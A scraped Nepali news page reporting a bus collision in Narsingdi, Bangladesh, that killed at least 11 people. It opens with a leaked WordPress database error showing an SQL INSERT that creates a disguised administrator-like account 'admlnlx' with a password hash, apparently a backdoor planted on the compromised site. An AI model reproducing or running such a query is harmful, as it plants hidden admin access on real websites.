WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf7IbA8M7UAyILXNXLkQqLk.9.2gXX.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:45:20', '', 'admlnlx', 'admlnlx')
ढाका, फागुन १ –
बङ्गलादेशको नर्सिङगदी जिल्लामा दुई वटा यात्रुबहाक बस एक आपसमा ठोक्किँदा भएको दुर्घटानमा परी कम्तीमा ११ जनाको मृत्यु भएको छ । यस घटनामा परी अन्य तीन जना घाइते भएका जिल्ला प्रहरी प्रमुख अमेना बेगमले जानकारी दिनु भएको छ ।
दुई बालबालिका र चार महिलासहित एघार यात्रुको घटनास्थलमै मृत्यु भएको बेगमले जानकारी दिनु भएको छ । स्थानीय समयानुसार विहान ९ बजे दुर्घटना भएका दुवै बसका घाइते यात्रुहरुको अवस्थापनि गम्भीर रहेको प्रहरीले जनाएको छ । घाइतेहरुको स्थानीय अस्पतालमा उपचार भईरहेको छ । एक मिनिबसले अर्को बसलाई उछिन्न खोज्दा दुर्घटना भएको प्रहरी प्रमुख बेगमले जानकारी दिनुभयो । बङ्गलादेश सडक दुर्घटनामा परी अत्याधिक व्यक्तिहरुको मृत्यु हुने देशमा पर्दछ ।- रासस ÷सिन्ह्वा